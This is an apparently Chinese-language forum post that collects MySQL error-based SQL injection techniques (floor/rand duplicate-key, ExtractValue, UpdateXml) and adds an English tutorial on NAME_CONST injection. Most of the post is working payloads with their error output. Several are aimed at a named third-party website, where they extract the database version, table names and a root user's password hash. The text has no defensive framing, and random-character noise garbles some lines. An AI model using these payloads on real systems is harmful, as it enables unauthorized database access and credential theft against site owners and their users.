找回密码
 立即注册
查看: 3356|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
, j: n3 M) I0 _2 R& q5 }首先进行正常查询:

mysql> select * from article where id = 1;
' @; J5 y! s( E. A+—-+——-+———+9 X- e% E# y$ K% T  ?
| id | title | content |. ]5 Y9 @  F, E( }! U
+—-+——-+———+
+ m# d6 M, E5 B$ Z3 r! c; l$ m|  1 | test  | do it   |; I1 K, ?& t$ @1 Q# ]
+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
$ ~0 a5 B) N7 b# w  YERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。1 Y' Y' p; g8 R- l4 ?8 J) W
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
4 a/ i) P3 w% N) @4 IERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));3 a4 h5 u4 O) `2 h$ o
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
9 p% h" L: B! d0 {$ z% `0 z测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–9 s  y8 ~' O) {3 v9 s5 H* R
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

) q( q  J; W5 W- V

/ w9 @- o; j! \5 A+ T7 _6 [

再收集:


6 i1 B7 q, |+ [& ghttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
% _1 r; j( Z( m5 H) i, k4 D7 L; {1 F( a  x- s1 B2 G
Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
2 w- ^- ?& W5 R* V8 v) ^+ i. }, U- f9 c3 o- l6 f+ }4 o( p( o. g
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)& {, P/ R( O' g8 U6 k$ e. s
- Y/ m- n, Z: q3 m* g( p
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
  {4 l9 c* V% i$ h5 @1 U% o- m1 W
. _0 L7 W2 N! P% |6 I: `. x0 UMYSQL高版本报错注入技巧-利用NAME_CONST注入
0 M3 u4 _+ G; E, lIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
% a" a3 ^! e; T( C; a# U$ Z3 b+ ^& W+ I1 U) t* A
5 T# T; w& H% }/ y2 w* p2 y
相关信息% M/ I! J, s! R0 L1 ]
2 v( g1 Z: G& A& r
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
9 i- H: P) _( x) e) p" c7 H( g4 z3 j- C  N0 e! ?' W" I# ^
Code:
/ p8 \3 @% C, l! Z) {NAME_CONST(DATA, VALUE)
3 l) f$ `; `( G- ]; q, s+ R: Y7 B: n6 f5 E( m
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.; w: i8 r  U% s2 U$ f2 c1 Q
, X9 T  W( y* M
SELECT NAME_CONST('TEST', 1): y- Q4 e0 k& ?! q

) c# v' W: m' m, b+ B1 B
  i7 y' x( l" U; z+ f# r
" @% j% B+ \' Y|---------------|
! H' t9 |, ]% U|     TEST      |2 s' n: y" P% N/ ]% M  D
|               |
4 @6 C3 ~8 M: H# T|---------------|
6 F% q( p6 @$ M# w- H) b, S! q2 |2 {- s|       1       |8 u% z3 `9 b" }1 w2 i. l
|               |
- M% _9 Y0 e! ]5 R7 S7 c" _|---------------|7 d6 h4 A- g& |$ v" J& L
% x: D* _/ x: J

" }' w6 B8 e! ?5 D, q
0 J) a; {, j) x4 i% L& A$ R, o  J. ~" i  a
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
! T) _3 m5 j2 F. @) `2 a& PIntro to MySQL Variables6 l# p& a1 `$ e' m" \$ K
, k5 F+ r& q0 S! t  N
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.6 W2 O- E% P6 J9 w. H( C6 U

; s4 n0 A. S  t5 eCode:9 T7 C. D  o$ W' {8 G
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
7 E( T5 ?# D. q! {. ]
: C4 f+ \) y; f. F  [& h

6 s! v8 j/ ?9 X: p7 ?- j2 a* z0 T. ?- g0 r& E! {. m
1 b2 [. `- P6 k/ v0 g* t+ A

/ X4 t2 K! W1 E! M' uCode:* S" Q4 F) q7 \- S: ?6 a
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--: d+ l" ]* `5 U, x( }% k

& U+ t+ s1 T- _( m# t( p: Q8 a" M# x8 Y' B# J- B, q1 u6 q6 o
VAR = Your MySQL variable.
& v0 d' `3 t, S& s9 b1 |+ }( O% ^8 o/ v
MySQL 5.1.3 Server System Variables
: [3 k$ t4 _! j2 P/ o6 H$ x% r: y3 p/ ?; Z2 T! D& d9 z5 s% k: L
Let's try it out on my site..
+ y& R6 t! B: k% e3 g: L* [( ?2 ?' S6 U  f3 W
Code:7 W# G. {- `1 ]) h7 W
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--; |) C; }7 K6 T3 t

. n7 V0 f7 J* N" G4 R" YErroruplicate column name '5.0.27-community-nt'2 C0 u( X& _$ R4 ~
  F. ]7 i0 w) F# _2 ?0 M1 n

) D1 [: |$ x, ?0 A
8 z! \. f$ o  P4 g) |  }# H" ~; ?+ n

* L9 o  m; |( [3 S- o3 I# c1 E: K2 _1 u* m- f2 Y
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...( M! B& l& c. m
& a. T0 l( E+ X4 ]/ r  Z2 }
Data Extraction
3 W- M" O1 t$ b. @) E, |+ Y8 x
7 [4 @* m* E! S' ICode:8 g- q; T1 F- R0 Z6 I& @7 |& D
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
, P$ O7 R, V/ t4 N$ u3 [- `
7 J3 I& z, M# `) D3 z

, R- h4 }2 I0 QWe should get a duplicate column 1 error...
/ s" H% W$ |% F$ \0 C: A6 s1 {3 Y% H+ n* F8 S
Code:4 q" W2 h" J9 X( c1 p1 U0 ~0 D
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--2 J1 w8 ~7 M2 u" `" t0 M

; o" m' R; ?1 B: \0 vErroruplicate column name '10 L, k) V) S7 O# b+ Z) e

- g, t# u  q& d. f) s" u1 Z0 n5 u: C" R7 n3 N, ]+ b) X
0 A1 s, ~# i. K/ @6 K0 g0 K
: E0 Y$ @5 C, _! b
. T5 i/ p' y4 w0 Y4 [; P

) G# w7 F8 s5 Y( D0 Y( RNow let's get the tables out this bitch..$ E( h4 s/ |% |$ x' }$ m
" x- o4 _6 ]7 k! f' A/ Z
Code:
1 |2 x+ M; ?' ~  Y) w  D+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
3 P5 h# t5 |; x- I5 T8 y! @

; w, ]9 k$ j6 J# \0 E" b3 K
* R4 ?! I  r$ O' k. P( PLet's see if it works here, if it does, we can go on and finish the job.
2 W+ J* R0 U  ~2 B3 s8 |; s2 V4 x6 n3 @8 ?$ h
Code:5 m+ g. m& F7 F: O% }/ M) W
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
! h1 ~8 R3 G5 i& ?/ H  N. E1 f' h/ o1 \1 ?2 h1 i

6 I: o5 v, ~- U. p' c+ c9 `9 }- JErroruplicate column name 'com_admanage" I" x0 K# R" G8 ?" {
# {5 [* o" s6 |4 `" n  M$ F

& p& [8 {  V  h4 i
5 [* l; T( K; t8 j
8 M& H- L$ W3 ~2 j  `

% t& c3 R& Q, u% n8 t4 t, F
" r7 M# l! q1 X& `Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
2 C* N6 U2 v( h+ [" G1 F0 T- f
# L$ P5 u+ j' m4 Y1 P% s' T$ mLet's get the columns out of the user table..
3 A+ [- R& x0 {
# s# p. P( l5 E; P$ Y% ~) s: QCode:
; a- J& L6 |: M+ T( }+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
7 K, j/ W9 k  M0 w
# q2 i- u) _5 m0 [( }

2 ?3 g! W3 o3 pSo mine looks like this, and I get the duplicate column name 'Host'.
" q; k. `; [4 |+ V- _7 A% y! n: U: f& P, E' I
Code:* D' }8 I6 H7 C
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
+ d* Q  M2 T& y! f$ c# H2 s$ _9 W! r! g) ^4 P; Y! \
Erroruplicate column name 'Host'
+ O6 C0 t# b( u& T: \

# ]* u- @" c6 @; h; z# {) H6 b/ m' u' c4 n! Q

$ ^9 c" S* D0 t5 @' q" H% [. r: ^! B; L; y: h, V
) l( _% r! ]# B5 v7 x) F

! `- u5 N0 }' \8 Z6 J% |9 w/ }5 @Woot, time to finish this bitch off.- S, t8 r! t  I& J; X' R0 P
: H3 q, E  Q. y0 S) d
Code:$ d: e" f( D/ }9 |  N: _4 ]/ ]
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--  P$ f( l% K: _% [* t

5 P& t8 d7 I1 J0 z
: H, s3 A' `- T. v5 ]' OSo mine looks like this...
4 y8 t) s. ^! M, x7 i% t' \. g3 @
Code:
; S* D' z$ N) f) U' Mhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--, c) Y) o# k: I4 p% B: Y: k& M2 P% p8 ?
& S' Y$ A! w3 s0 K) v5 P
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
2 {; E% X9 t* Y! Q# M0 M$ c' N" G3 U

0 M4 A) J9 t, h
! b& W) R, |' Y! X6 ] 2 q1 W- @4 _2 A% b  J

7 c$ q# |! Y% A/ v

2 ]) @; `8 a( O& i0 }% m/ Y3 |9 M9 F! T: S' [' a6 H' ]
And there we have it, thanks for reading.

, m/ c8 a1 H$ q+ _/ i! _! `$ N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表